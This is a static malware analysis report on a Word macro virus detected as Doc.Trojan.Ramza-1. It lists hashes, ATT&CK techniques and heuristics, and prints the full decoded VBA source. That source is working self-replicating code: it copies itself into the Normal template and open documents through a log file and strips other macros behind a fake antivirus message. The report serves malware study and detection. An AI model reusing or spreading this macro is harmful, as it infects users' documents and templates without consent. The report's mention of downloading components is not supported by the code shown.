Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 813e218e64d0def4…

MALICIOUS

Office (OLE)

31.0 KB Created: 1999-06-16 13:03:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 47bc792ab8e7c090d037417b667f7cf0 SHA-1: 0c6b56e0b890166eefbd7c8043ab8651956cb387 SHA-256: 813e218e64d0def4d6c2d51ce404fccc66d5314fa578d3c20e5ddb2aed613b9c
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros, specifically a Document_Open macro. This macro attempts to write its code to a log file at 'c:\windows\scandisk.log' and then potentially inject it into the Normal template and the active document. This behavior is indicative of malware attempting to establish persistence or download additional malicious components. The ClamAV detection further supports its malicious nature.

Heuristics 3

  • ClamAV: Doc.Trojan.Ramza-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ramza-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2178 bytes
SHA-256: 39a59d6bbe3228add9c852bb7e3cae423bd28642a1776411a4a34e3158b4fab7
Detection
ClamAV: Doc.Trojan.Ramza-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const Azmar = "The Azmar"
Dim Normal, Active As Object
Dim Code, Macro, Nome As String
Dim Lines As Integer
Dim Contaminado As Boolean
Private Sub Document_Open()
On Error Resume Next
Set Normal = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
Set Active = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule

If Not Active.Find(Azmar, 1, 1, 100, 100) Then
 Macro = Normal.Lines(1, Normal.CountOfLines)
 Lines = Normal.CountOfLines
Else
 Macro = Active.Lines(1, Active.CountOfLines)
 Lines = Active.CountOfLines
End If

Open "c:\windows\scandisk.log" For Output As #1
Print #1, Macro
Close #1

If Not Normal.Find(Azmar, 1, 1, 100, 100) Then
 Normal.DeleteLines 1, Lines
 Normal.AddFromFile ("c:\windows\scandisk.log")
 NormalTemplate.Save
End If

End Sub
Private Sub Document_Close()
On Error Resume Next
Set Active = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
Lines = Active.CountOfLines
If Not Active.Find(Azmar, 1, 1, 100, 100) Then
 Active.DeleteLines 1, Lines
 Active.AddFromFile ("c:\windows\scandisk.log")
 ActiveDocument.Save
End If

Contaminado = False
For Code = NormalTemplate.VBProject.VBComponents.Count To 2 Step -1
 Nome = NormalTemplate.VBProject.VBComponents(Code).Name
 MsgBox "Possível vírus! " & Nome & " pronto para remoção!", , "AntiMacro - By Pacheco"
 NormalTemplate.VBProject.VBComponents.Remove NormalTemplate.VBProject.VBComponents(Code)
Next

If Contaminado Then
 NormalTemplate.Save
End If

Contaminado = False
For Code = ActiveDocument.VBProject.VBComponents.Count To 2 Step -1
 Nome = ActiveDocument.VBProject.VBComponents(Code).Name
 MsgBox "Possível vírus! " & Nome & " pronto para remoção!", , "AntiMacro - By Pacheco"
 ActiveDocument.VBProject.VBComponents.Remove ActiveDocument.VBProject.VBComponents(Code)
 Contaminado = True
Next

If Contaminado Then
 ActiveDocument.Save
End If

End Sub